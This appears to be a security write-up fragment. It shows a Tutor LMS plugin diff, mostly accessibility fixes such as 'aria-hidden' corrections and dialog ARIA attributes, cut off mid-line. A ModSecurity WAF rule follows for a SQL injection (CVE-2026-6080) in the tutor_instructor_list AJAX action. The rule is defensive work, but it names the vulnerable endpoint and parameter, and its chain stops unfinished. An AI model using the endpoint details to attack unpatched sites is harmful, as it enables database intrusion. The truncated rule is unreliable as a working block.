 										<?php endif; ?>
 										<?php $courses_data_string = implode( ',', array_map( fn( $course_data ) => get_the_title( $course_data['course_id'] ), $courses ) ); ?>
 										<a href="javascript:;" class="tutor-export-purchase-history tutor-iconic-btn tutor-iconic-btn-secondary" data-order="<?php echo esc_attr( $order->ID ); ?>" data-course-name="<?php echo esc_attr( '"' . $courses_data_string . '"' ); ?>" data-price="<?php echo esc_attr( $raw_price ); ?>" data-date="<?php echo esc_attr( '"' . date_i18n( get_option( 'date_format' ), strtotime( $order->post_date ) ) . '"' ); ?>" data-status="<?php echo esc_attr( $order_status_text ); ?>">
-											<span class="tutor-icon-receipt-line" area-hidden="true"></span>
+											<span class="tutor-icon-receipt-line" aria-hidden="true"></span>
 										</a>
 									</div>
 								</td>
--- a/tutor/templates/dashboard/registration.php
+++ b/tutor/templates/dashboard/registration.php
@@ -157,9 +157,18 @@
 				$tutor_toc_page_link = tutor_utils()->get_toc_page_link();
 			?>
 			<?php if ( null !== $tutor_toc_page_link ) : ?>
-				<div class="tutor-mb-24">
-					<?php esc_html_e( 'By signing up, I agree with the website's', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
-				</div>
+				<div class="tutor-form-row tutor-mb-24">
+					<div class="tutor-form-col-12">
+						<div class="tutor-d-flex tutor-gap-1 tutor-align-center">
+							<div class="tutor-form-wrap">
+								<input type="checkbox" id="tutor-terms-conditions" name="terms_conditions" required>
+							</div>
+							<label for="tutor-terms-conditions">
+								<?php esc_html_e( 'By signing up, you agree to the ', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
+							</label>
+						</div>
+					</div>
+				</div>
 			<?php endif; ?>

 			<div>
--- a/tutor/templates/dashboard/reviews/given-reviews.php
+++ b/tutor/templates/dashboard/reviews/given-reviews.php
@@ -72,12 +72,12 @@
 							<div class="tutor-col-auto">
 								<div class="tutor-given-review-actions tutor-d-flex">
 									<span class="tutor-btn tutor-btn-ghost" data-tutor-modal-target="<?php echo esc_html( $update_id ); ?>" role="button">
-										<i class="tutor-icon-edit tutor-mr-8" area-hidden="true"></i>
+										<i class="tutor-icon-edit tutor-mr-8" aria-hidden="true"></i>
 										<span><?php esc_html_e( 'Edit', 'tutor' ); ?></span>
 									</span>

 									<span class="tutor-btn tutor-btn-ghost tutor-ml-16" data-tutor-modal-target="<?php echo esc_html( $delete_id ); ?>" role="button">
-										<i class="tutor-icon-trash-can-line tutor-mr-8"  area-hidden="true"></i>
+										<i class="tutor-icon-trash-can-line tutor-mr-8" aria-hidden="true"></i>
 										<span><?php esc_html_e( 'Delete', 'tutor' ); ?></span>
 									</span>
 								</div>
@@ -90,16 +90,16 @@
 					</div>

 					<!-- Edit Review Modal -->
-					<form class="tutor-modal" id="<?php echo esc_html( $update_id ); ?>">
+					<form class="tutor-modal" id="<?php echo esc_html( $update_id ); ?>" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_html( $update_id ); ?>-title" aria-hidden="true">
 						<div class="tutor-modal-overlay"></div>
 						<div class="tutor-modal-window">
 							<div class="tutor-modal-content tutor-modal-content-white">
-								<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-									<span class="tutor-icon-times" area-hidden="true"></span>
+								<button type="button" class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+									<span class="tutor-icon-times" aria-hidden="true"></span>
 								</button>

 								<div class="tutor-modal-body tutor-text-center">
-									<div class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mt-48 tutor-mb-12"><?php esc_html_e( 'How would you rate this course?', 'tutor' ); ?></div>
+									<div id="<?php echo esc_html( $update_id ); ?>-title" class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mt-48 tutor-mb-12"><?php esc_html_e( 'How would you rate this course?', 'tutor' ); ?></div>
 									<div class="tutor-fs-6 tutor-color-muted"><?php esc_html_e( 'Select Rating', 'tutor' ); ?></div>

 									<input type="hidden" name="course_id" value="<?php echo esc_html( $review->comment_post_ID ); ?>"/>
@@ -112,7 +112,7 @@
 									?>
 									</div>

-									<textarea class="tutor-form-control tutor-mt-28" name="review" placeholder="<?php esc_html_e( 'write a review', 'tutor' ); ?>"><?php echo esc_html( stripslashes( $review->comment_content ) ); ?></textarea>
+									<textarea class="tutor-form-control tutor-mt-28" name="review" aria-label="<?php esc_attr_e( 'Update your review', 'tutor' ); ?>" placeholder="<?php esc_html_e( 'write a review', 'tutor' ); ?>"><?php echo esc_html( stripslashes( $review->comment_content ) ); ?></textarea>

 									<div class="tutor-d-flex tutor-justify-center tutor-my-48">
 										<button type="button" class="tutor-btn tutor-btn-outline-primary" data-tutor-modal-close data-action="back">
--- a/tutor/templates/dashboard/settings/profile.php
+++ b/tutor/templates/dashboard/settings/profile.php
@@ -74,7 +74,7 @@
 			</span>
 			<div class="tutor_overlay">
 				<button class="tutor_cover_uploader tutor-btn tutor-btn-primary">
-					<i class="tutor-icon-camera tutor-mr-12" area-hidden="true"></i>
+					<i class="tutor-icon-camera tutor-mr-12" aria-hidden="true"></i>
 					<span><?php echo $profile_photo_id ? esc_html__( 'Update Cover Photo', 'tutor' ) : esc_html__( 'Upload Cover Photo', 'tutor' ); ?></span>
 				</button>
 			</div>
--- a/tutor/templates/dashboard/withdraw.php
+++ b/tutor/templates/dashboard/withdraw.php
@@ -60,7 +60,7 @@
 		<div class="tutor-row tutor-align-lg-center">
 			<div class="tutor-col-lg-auto tutor-mb-16 tutor-mb-lg-0">
 				<div class="tutor-round-box tutor-p-8">
-					<i class="tutor-icon-wallet" area-hidden="true"></i>
+					<i class="tutor-icon-wallet" aria-hidden="true"></i>
 				</div>
 			</div>

@@ -130,21 +130,21 @@
 	<?php
 	if ( $is_balance_sufficient && $withdraw_method_name ) {
 		?>
-		<div id="tutor-earning-withdraw-modal" class="tutor-modal">
+		<div id="tutor-earning-withdraw-modal" class="tutor-modal" role="dialog" aria-modal="true" aria-labelledby="tutor-withdraw-modal-title" aria-hidden="true">
 			<div class="tutor-modal-overlay"></div>
 			<div class="tutor-modal-window">
 				<div class="tutor-modal-content tutor-modal-content-white">
-					<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-						<span class="tutor-icon-times" area-hidden="true"></span>
+					<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+						<span class="tutor-icon-times" aria-hidden="true"></span>
 					</button>

 					<div class="tutor-modal-body">
 						<div class="tutor-py-20 tutor-px-24">
 							<div class="tutor-round-box tutor-round-box-lg tutor-mb-16">
-								<span class="tutor-icon-wallet" area-hidden="true"></span>
+								<span class="tutor-icon-wallet" aria-hidden="true"></span>
 							</div>

-							<div class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-24"><?php esc_html_e( 'Withdrawal Request', 'tutor' ); ?></div>
+							<div id="tutor-withdraw-modal-title" class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-24"><?php esc_html_e( 'Withdrawal Request', 'tutor' ); ?></div>
 							<div class="tutor-fs-6 tutor-color-muted"><?php esc_html_e( 'Please check your transaction notification on your connected withdrawal method', 'tutor' ); ?></div>

 							<div class="tutor-row tutor-mt-32">
@@ -160,7 +160,7 @@
 							</div>
 						</div>

-						<div class="tutor-mx-n32 tutor-my-32"><div class="tutor-hr" area-hidden="true"></div></div>
+						<div class="tutor-mx-n32 tutor-my-32"><div class="tutor-hr" aria-hidden="true"></div></div>

 						<form id="tutor-earning-withdraw-form" method="post">
 							<div class="tutor-py-20 tutor-px-24">
@@ -176,7 +176,7 @@
 									</div>

 									<div class="tutor-form-help tutor-d-flex tutor-align-center">
-										<span class="tutor-icon-circle-question-mark tutor-mr-8" area-hidden="true"></span>
+										<span class="tutor-icon-circle-question-mark tutor-mr-8" aria-hidden="true"></span>
 										<span><?php echo wp_kses( __( 'Minimum withdraw amount is', 'tutor' ) . ' ' . $formatted_min_withdraw_amount, array() ); ?></span>
 									</div>

--- a/tutor/templates/ecommerce/checkout-details.php
+++ b/tutor/templates/ecommerce/checkout-details.php
@@ -100,7 +100,7 @@
 											</h6>
 										</div>
 										<div class="tutor-checkout-coupon-badge <?php echo esc_attr( $item->is_coupon_applied ? '' : 'tutor-d-none' ); ?>">
-											<i class="tutor-icon-tag" area-hidden="true"></i>
+											<i class="tutor-icon-tag" aria-hidden="true"></i>
 											<span><?php echo esc_html( $item->is_coupon_applied ? $checkout_data->coupon_title : '' ); ?></span>
 										</div>
 									</div>
@@ -170,12 +170,12 @@

 			<div class="tutor-checkout-summary-item tutor-checkout-coupon-wrapper <?php echo esc_attr( $checkout_data->is_coupon_applied ? '' : 'tutor-d-none' ); ?>">
 				<div class="tutor-checkout-coupon-badge tutor-has-delete-button">
-					<i class="tutor-icon-tag" area-hidden="true"></i>
+					<i class="tutor-icon-tag" aria-hidden="true"></i>
 					<span><?php echo esc_html( $checkout_data->coupon_title ); ?></span>

 					<?php if ( $checkout_data->is_coupon_applied ) : ?>
 					<button type="button" id="tutor-checkout-remove-coupon" class="tutor-btn">
-						<i class="tutor-icon-times" area-hidden="true"></i>
+						<i class="tutor-icon-times" aria-hidden="true"></i>
 					</button>
 					<?php endif; ?>
 				</div>
--- a/tutor/templates/global/attachments.php
+++ b/tutor/templates/global/attachments.php
@@ -32,7 +32,7 @@

 							<div class="tutor-col-auto">
 								<a href="<?php echo esc_url( $attachment->url ); ?>" class="tutor-iconic-btn tutor-iconic-btn-secondary tutor-stretched-link" <?php echo esc_attr( $open_mode_view ? $open_mode_view : "download={$attachment->name}" ); ?>>
-									<span class="tutor-icon-download" area-hidden="true"></span>
+									<span class="tutor-icon-download" aria-hidden="true"></span>
 								</a>
 							</div>
 						</div>
--- a/tutor/templates/login-form.php
+++ b/tutor/templates/login-form.php
@@ -63,7 +63,7 @@
 		<input type="password" class="tutor-form-control" placeholder="<?php esc_html_e( 'Password', 'tutor' ); ?>" name="pwd" value="" size="20" required/>
 	</div>

-	<div class="tutor-login-error"></div>
+	<div class="tutor-login-error" role="alert" aria-live="polite"></div>
 	<?php
 		do_action( 'tutor_login_form_middle' );
 		do_action( 'login_form' );
@@ -85,7 +85,7 @@
 	<button type="submit" class="tutor-btn tutor-btn-primary tutor-btn-block">
 		<?php esc_html_e( 'Sign In', 'tutor' ); ?>
 	</button>
-
+
 	<?php if ( get_option( 'users_can_register', false ) ) : ?>
 		<?php
 			$url_arg = array(
@@ -106,10 +106,10 @@
 </form>
 <?php
 do_action( 'tutor_after_login_form' );
-if ( ! tutor_utils()->is_tutor_frontend_dashboard() ) : ?>
+if ( ! tutor_utils()->is_tutor_frontend_dashboard() ) :
+	?>
 <script>
 	document.addEventListener('DOMContentLoaded', function() {
-		var { __ } = wp.i18n;
 		var loginModal = document.querySelector('.tutor-modal.tutor-login-modal');
 		var errors = <?php echo wp_json_encode( $login_errors ); ?>;
 		if (loginModal && errors.length) {
--- a/tutor/templates/loop/course-price-tutor.php
+++ b/tutor/templates/loop/course-price-tutor.php
@@ -59,7 +59,7 @@

 				<div class="tutor-course-booking-progress tutor-d-flex tutor-align-center">
 					<div class="tutor-mr-8">
-						<div class="tutor-progress-circle" style="--pro: <?php echo esc_html( $b_total ) . '%'; ?>" area-hidden="true"></div>
+						<div class="tutor-progress-circle" style="--pro: <?php echo esc_html( $b_total ) . '%'; ?>" aria-hidden="true"></div>
 					</div>
 					<div class="tutor-fs-7 tutor-fw-medium tutor-color-black">
 					<?php echo esc_html( $b_total ) . __( '% Booked', 'tutor' ); ?>
--- a/tutor/templates/loop/course-price-woocommerce.php
+++ b/tutor/templates/loop/course-price-woocommerce.php
@@ -59,7 +59,7 @@

                     <div class="tutor-course-booking-progress tutor-d-flex tutor-align-center">
                         <div class="tutor-mr-8">
-                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" area-hidden="true"></div>
+                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" aria-hidden="true"></div>
                         </div>
                         <div class="tutor-fs-7 tutor-fw-medium tutor-color-black">' .
 						esc_html( $b_total ) . __( '% Booked', 'tutor' ) . '
--- a/tutor/templates/loop/course-price.php
+++ b/tutor/templates/loop/course-price.php
@@ -60,7 +60,7 @@

                     <div class="tutor-course-booking-progress tutor-d-flex tutor-align-center">
                         <div class="tutor-mr-8">
-                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" area-hidden="true"></div>
+                            <div class="tutor-progress-circle" style="--pro: ' . esc_html( $b_total ) . '%;" aria-hidden="true"></div>
                         </div>
                         <div class="tutor-fs-7 tutor-fw-medium tutor-color-black">' .
 						esc_html( $b_total ) . __( '% Booked', 'tutor' ) . '
--- a/tutor/templates/loop/enrolled-course-progress.php
+++ b/tutor/templates/loop/enrolled-course-progress.php
@@ -24,6 +24,6 @@
 		</span>
 	</div>
 	<div class="tutor-progress-bar tutor-mt-12" style="--tutor-progress-value:<?php echo esc_attr( $course_progress['completed_percent'] ); ?>%;">
-		<span class="tutor-progress-value" area-hidden="true"></span>
+		<span class="tutor-progress-value" aria-hidden="true"></span>
 	</div>
 </div>
--- a/tutor/templates/loop/meta.php
+++ b/tutor/templates/loop/meta.php
@@ -23,14 +23,14 @@
 <div class="tutor-meta tutor-mt-12 tutor-mb-20">
 	<?php if ( tutor_utils()->get_option( 'enable_course_total_enrolled' ) ) : ?>
 		<div>
-			<span class="tutor-meta-icon tutor-icon-user-line" area-hidden="true"></span>
+			<span class="tutor-meta-icon tutor-icon-user-line" aria-hidden="true"></span>
 			<span class="tutor-meta-value"><?php echo esc_html( $course_students ); ?></span>
 		</div>
 	<?php endif; ?>

 	<?php if ( ! empty( $course_duration ) ) : ?>
 		<div>
-			<span class="tutor-icon-clock-line tutor-meta-icon" area-hidden="true"></span>
+			<span class="tutor-icon-clock-line tutor-meta-icon" aria-hidden="true"></span>
 			<span class="tutor-meta-value">
 				<?php
                     //phpcs:ignore --escaping through helper method
--- a/tutor/templates/metabox-wrapper.php
+++ b/tutor/templates/metabox-wrapper.php
@@ -12,7 +12,7 @@
 <div class="tutor-course-builder-section">
 	<div class="tutor-course-builder-section-title">
 		<span class="tutor-fs-5 tutor-fw-bold tutor-color-secondary">
-			<i class="tutor-icon-angle-up" area-hidden="true"></i>
+			<i class="tutor-icon-angle-up" aria-hidden="true"></i>
 			<span><?php echo esc_html( $title ); ?></span>
 		</span>
 	</div>
--- a/tutor/templates/modal/alert.php
+++ b/tutor/templates/modal/alert.php
@@ -10,25 +10,25 @@
  * @since 2.0.2
  */

-$id      = isset( $id ) ? $id : ''; //phpcs:ignore
+$id      = isset( $id ) ? $id : 'tutor-alert-modal-' . uniqid(); // Ensure we have an ID for ARIA.
 $class   = isset( $class ) ? ' ' . $class : '';
 $title   = isset( $title ) ? $title : 'Do You Want to Delete This?'; // phpcs:ignore
 $content = isset( $content ) ? $content : '';
 $close   = isset( $close ) ? (bool) $close : true;
 ?>
-<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>">
+<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_attr( $id ); ?>-title" aria-hidden="true">
 	<div class="tutor-modal-overlay"></div>
 	<div class="tutor-modal-window tutor-modal-window-sm">
 		<div class="tutor-modal-content tutor-modal-content-white">
 			<?php if ( $close ) : ?>
-			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-				<span class="tutor-icon-times" area-hidden="true"></span>
+			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+				<span class="tutor-icon-times" aria-hidden="true"></span>
 			</button>
 			<?php endif; ?>
 			<div class="tutor-modal-body tutor-text-center">
 				<div class="tutor-my-32">
 					<?php if ( $title ) : ?>
-						<div class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-8"><?php echo esc_html( $title ); ?></div>
+						<div id="<?php echo esc_attr( $id ); ?>-title" class="tutor-fs-4 tutor-fw-medium tutor-color-black tutor-mb-8"><?php echo esc_html( $title ); ?></div>
 					<?php endif; ?>
 					<?php if ( $content ) : ?>
 						<div class="tutor-fs-6 tutor-color-muted"><?php echo esc_html( $content ); ?></div>
--- a/tutor/templates/modal/confirm.php
+++ b/tutor/templates/modal/confirm.php
@@ -10,7 +10,7 @@
  * @since 2.0.2
  */

-$id      = isset( $id ) ? $id : ''; //phpcs:ignore
+$id      = isset( $id ) ? $id : 'tutor-confirm-modal-' . uniqid(); // Ensure we have an ID for ARIA.
 $class   = isset( $class ) ? ' ' . $class : '';
 $image   = isset( $image ) ? $image : '';
 $icon    = isset( $icon ) ? $icon : '';
@@ -19,31 +19,31 @@
 $yes     = isset( $yes ) ? $yes : array( 'text' => __( 'Yes', 'tutor' ) );
 $close   = isset( $close ) ? (bool) $close : true;
 ?>
-<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>">
+<div id="<?php echo esc_attr( $id ); ?>" class="tutor-modal<?php echo esc_attr( $class ); ?>" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_attr( $id ); ?>-title" aria-hidden="true">
 	<div class="tutor-modal-overlay"></div>
 	<div class="tutor-modal-window">
 		<div class="tutor-modal-content tutor-modal-content-white">
 			<?php if ( $close ) : ?>
-			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-				<span class="tutor-icon-times" area-hidden="true"></span>
+			<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+				<span class="tutor-icon-times" aria-hidden="true"></span>
 			</button>
 			<?php endif; ?>
 			<div class="tutor-modal-body tutor-text-center">
 				<div class="tutor-px-lg-48 tutor-py-lg-24">
 					<?php if ( $image ) : ?>
 						<div class="tutor-mt-24">
-							<img class="tutor-d-inline-block" src="<?php echo esc_url( tutor()->url ); ?>assets/images/<?php echo esc_attr( $image ); ?>" />
+							<img class="tutor-d-inline-block" src="<?php echo esc_url( tutor()->url ); ?>assets/images/<?php echo esc_attr( $image ); ?>" alt="" />
 						</div>
 					<?php endif; ?>

 					<?php if ( $icon ) : ?>
 						<div class="tutor-mt-24">
-							<span class="tutor-d-inline-block"><?php echo esc_attr( $icon ); ?></span>
+							<span class="tutor-d-inline-block" aria-hidden="true"><?php echo esc_attr( $icon ); ?></span>
 						</div>
 					<?php endif; ?>

 					<?php if ( $title ) : ?>
-						<div class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php echo esc_html( $title ); ?></div>
+						<div id="<?php echo esc_attr( $id ); ?>-title" class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php echo esc_html( $title ); ?></div>
 					<?php endif; ?>

 					<?php if ( $content ) : ?>
--- a/tutor/templates/shortcode/instructor-filter.php
+++ b/tutor/templates/shortcode/instructor-filter.php
@@ -40,13 +40,13 @@
 		<aside class="tutor-col-lg-3 tutor-mb-32 tutor-mb-lg-0" tutor-instructors-filters>
 			<div class="tutor-d-flex tutor-align-center">
 				<div>
-					<span class="tutor-icon-slider-vertical tutor-color-primary tutor-mr-8" area-hidden="true"></span>
+					<span class="tutor-icon-slider-vertical tutor-color-primary tutor-mr-8" aria-hidden="true"></span>
 					<span class="tutor-fs-5 tutor-fw-medium tutor-color-black"><?php esc_html_e( 'Filters', 'tutor' ); ?></span>
 				</div>

 				<div class="tutor-ml-32">
 					<a href="#" class="tutor-btn tutor-btn-ghost" tutor-instructors-filter-clear>
-						<span class="tutor-icon-times tutor-mr-8" area-hidden="true"></span>
+						<span class="tutor-icon-times tutor-mr-8" aria-hidden="true"></span>
 						<span class="tutor-fw-medium"><?php esc_html_e( 'Clear', 'tutor' ); ?></span>
 					</a>
 				</div>
@@ -73,7 +73,7 @@

 					<?php if ( $show_more ) : ?>
 						<a href="#" class="tutor-btn-show-more tutor-btn tutor-btn-ghost tutor-mt-32" data-tutor-toggle-more=".tutor-toggle-more-content">
-							<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" area-hidden="true"></span>
+							<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" aria-hidden="true"></span>
 							<span class="tutor-toggle-btn-text"><?php esc_html_e( 'Show More', 'tutor' ); ?></span>
 						</a>
 					<?php endif; ?>
@@ -89,7 +89,7 @@
 				<div class="tutor-ratings tutor-ratings-lg tutor-ratings-selectable">
 						<div class="tutor-ratings-stars">
 							<?php for ( $i = 1; $i < 6; $i++ ) : ?>
-								<i class="tutor-icon-star-line" tutor-instructors-filter-rating data-value="<?php echo esc_attr( $i ); ?>" area-hidden="true"></i>
+								<i class="tutor-icon-star-line" tutor-instructors-filter-rating data-value="<?php echo esc_attr( $i ); ?>" aria-hidden="true"></i>
 							<?php endfor; ?>
 						</div>
 						<span class="tutor-ratings-count tutor-instructor-rating-filter" tutor-instructors-filter-rating-count></span>
@@ -99,12 +99,12 @@
 		</aside>

 		<?php if ( $columns < 3 ) : ?>
-		<div class="tutor-col-1 tutor-d-none tutor-d-xl-block" area-hidden="true"></div>
+		<div class="tutor-col-1 tutor-d-none tutor-d-xl-block" aria-hidden="true"></div>
 		<?php endif; ?>

 		<main class="tutor-col-lg-9 tutor-col-xl-<?php echo $columns < 3 ? 8 : 9; ?>">
 			<div class="tutor-form-wrap tutor-mb-24">
-				<span class="tutor-icon-search tutor-form-icon" area-hidden="true"></span>
+				<span class="tutor-icon-search tutor-form-icon" aria-hidden="true"></span>
 				<input type="text" class="tutor-form-control" name="keyword" placeholder="<?php esc_html_e( 'Search any instructor...', 'tutor' ); ?>" tutor-instructors-filter-search />
 			</div>
 			<div class="tutor-d-flex tutor-align-center tutor-mb-24">
--- a/tutor/templates/single-content-loader.php
+++ b/tutor/templates/single-content-loader.php
@@ -97,7 +97,7 @@
 				</div>
 				<div class="list-item-progress tutor-my-16">
 					<div class="tutor-progress-bar tutor-mt-12" style="--tutor-progress-value:<?php echo esc_attr( $course_stats['completed_percent'] ); ?>%;">
-						<span class="tutor-progress-value" area-hidden="true"></span>
+						<span class="tutor-progress-value" aria-hidden="true"></span>
 					</div>
 				</div>
 			</div>
--- a/tutor/templates/single/common/footer.php
+++ b/tutor/templates/single/common/footer.php
@@ -30,7 +30,7 @@
 <div class="tutor-course-topic-single-footer tutor-px-32 tutor-py-12 tutor-mt-auto">
 	<div class="tutor-single-course-content-prev">
 		<a class="tutor-btn tutor-btn-secondary tutor-btn-sm" href="<?php echo esc_url( $prev_link ); ?>"<?php echo ! $previous_id ? ' disabled="disabled"' : ''; ?>>
-			<span class="tutor-icon-<?php echo is_rtl() ? 'next' : 'previous'; ?>" area-hidden="true"></span>
+			<span class="tutor-icon-<?php echo is_rtl() ? 'next' : 'previous'; ?>" aria-hidden="true"></span>
 			<span class="tutor-ml-8"><?php esc_html_e( 'Previous', 'tutor' ); ?></span>
 		</a>
 	</div>
@@ -38,7 +38,7 @@
 	<div class="tutor-single-course-content-next">
 		<a class="tutor-btn tutor-btn-secondary tutor-btn-sm" href="<?php echo esc_url( $next_link ); ?>"<?php echo ! $next_id ? ' disabled="disabled"' : ''; ?>>
 			<span class="tutor-mr-8"><?php esc_html_e( 'Next', 'tutor' ); ?></span>
-			<span class="tutor-icon-<?php echo is_rtl() ? 'previous' : 'next'; ?>" area-hidden="true"></span>
+			<span class="tutor-icon-<?php echo is_rtl() ? 'previous' : 'next'; ?>" aria-hidden="true"></span>
 		</a>
 	</div>
 </div>
--- a/tutor/templates/single/common/header.php
+++ b/tutor/templates/single/common/header.php
@@ -48,11 +48,11 @@
 ?>
 <div class="tutor-course-topic-single-header tutor-single-page-top-bar">
 	<a href="#" class="tutor-course-topics-sidebar-toggler tutor-iconic-btn tutor-iconic-btn-secondary tutor-d-none tutor-d-xl-inline-flex tutor-flex-shrink-0" tutor-course-topics-sidebar-toggler>
-		<span class="tutor-icon-left" area-hidden="true"></span>
+		<span class="tutor-icon-left" aria-hidden="true"></span>
 	</a>

 	<a href="<?php echo esc_url( get_the_permalink( $course_id ) ); ?>" class="tutor-iconic-btn tutor-d-flex tutor-d-xl-none">
-		<span class="tutor-icon-previous" area-hidden="true"></span>
+		<span class="tutor-icon-previous" aria-hidden="true"></span>
 	</a>

 	<div class="tutor-course-topic-single-header-title tutor-fs-6 tutor-ml-12 tutor-ml-xl-24">
@@ -92,13 +92,13 @@
 		}
 		?>
 		<a class="tutor-iconic-btn tutor-flex-shrink-0" href="<?php echo esc_url( get_the_permalink( $course_id ) ); ?>">
-			<span class="tutor-icon-times" area-hidden="true"></span>
+			<span class="tutor-icon-times" aria-hidden="true"></span>
 		</a>
 	</div>

 	<div class="tutor-ml-auto tutor-align-center tutor-d-block tutor-d-xl-none">
 		<a class="tutor-iconic-btn" href="#" tutor-course-topics-sidebar-offcanvas-toggler>
-			<span class="tutor-icon-hamburger-menu" area-hidden="true"></span>
+			<span class="tutor-icon-hamburger-menu" aria-hidden="true"></span>
 		</a>
 	</div>
 </div>
--- a/tutor/templates/single/course/course-benefits.php
+++ b/tutor/templates/single/course/course-benefits.php
@@ -25,7 +25,7 @@
 		<ul class="tutor-course-details-widget-list tutor-color-black tutor-fs-6 tutor-m-0 tutor-mt-16">
 			<?php foreach ( $course_benefits as $benefit ) : ?>
 				<li class="tutor-d-flex tutor-mb-12">
-					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" area-hidden="true"></span>
+					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" aria-hidden="true"></span>
 					<span><?php echo esc_html( $benefit ); ?></span>
 				</li>
 			<?php endforeach; ?>
--- a/tutor/templates/single/course/course-content.php
+++ b/tutor/templates/single/course/course-content.php
@@ -37,7 +37,7 @@

 		<?php if ( $has_show_more ) : ?>
 		<a href="#" class="tutor-btn-show-more tutor-btn tutor-btn-ghost tutor-mt-32" data-tutor-toggle-more=".tutor-toggle-more-content">
-			<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" area-hidden="true"></span>
+			<span class="tutor-toggle-btn-icon tutor-icon tutor-icon-plus tutor-mr-8" aria-hidden="true"></span>
 			<span class="tutor-toggle-btn-text"><?php esc_html_e( 'Show More', 'tutor' ); ?></span>
 		</a>
 	<?php endif; ?>
--- a/tutor/templates/single/course/course-entry-box.php
+++ b/tutor/templates/single/course/course-entry-box.php
@@ -99,7 +99,7 @@
 							</span>
 						</div>
 						<div class="tutor-progress-bar tutor-mt-12" style="--tutor-progress-value:<?php echo esc_attr( $completed_percent ); ?>%;">
-							<span class="tutor-progress-value" area-hidden="true"></span>
+							<span class="tutor-progress-value" aria-hidden="true"></span>
 						</div>
 					</div>
 				</div>
@@ -234,7 +234,7 @@
 				?>
 					<div class="tutor-alert tutor-warning tutor-mt-28">
 						<div class="tutor-alert-text">
-							<span class="tutor-icon-circle-info tutor-alert-icon tutor-mr-12" area-hidden="true"></span>
+							<span class="tutor-icon-circle-info tutor-alert-icon tutor-mr-12" aria-hidden="true"></span>
 							<span>
 								<?php esc_html_e( 'This course is full right now. We limit the number of students to create an optimized and productive group dynamic.', 'tutor' ); ?>
 							</span>
--- a/tutor/templates/single/course/course-requirements.php
+++ b/tutor/templates/single/course/course-requirements.php
@@ -27,7 +27,7 @@
 		<ul class="tutor-course-details-widget-list tutor-fs-6 tutor-color-black">
 			<?php
 			foreach ( $course_requirements as $requirement ) {
-				echo '<li class="tutor-d-flex tutor-mb-12"><span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" area-hidden="true"></span><span>' . esc_html( $requirement ) . '</span></li>';
+				echo '<li class="tutor-d-flex tutor-mb-12"><span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" aria-hidden="true"></span><span>' . esc_html( $requirement ) . '</span></li>';
 			}
 			?>
 		</ul>
--- a/tutor/templates/single/course/course-target-audience.php
+++ b/tutor/templates/single/course/course-target-audience.php
@@ -26,7 +26,7 @@
 		<ul class="tutor-course-details-widget-list tutor-fs-6 tutor-color-black">
 			<?php foreach ( $target_audience as $audience ) : ?>
 				<li class="tutor-d-flex tutor-mb-12">
-					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" area-hidden="true"></span>
+					<span class="tutor-icon-bullet-point tutor-color-muted tutor-mt-2 tutor-mr-8 tutor-fs-8" aria-hidde

# Atomic Edge WAF Rule - CVE-2026-6080
# Blocks SQL injection via date parameter in Tutor LMS instructor listing
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20266080,phase:2,deny,status:403,chain,msg:'CVE-2026-6080 SQL Injection via Tutor LMS date parameter',severity:'CRITICAL',tag:'CVE-2026-6080',tag:'WordPress',tag:'Plugin/Tutor-LMS',tag:'attack-sql-injection'"
  SecRule ARGS_POST:action "@streq tutor_instructor_list" "chain"
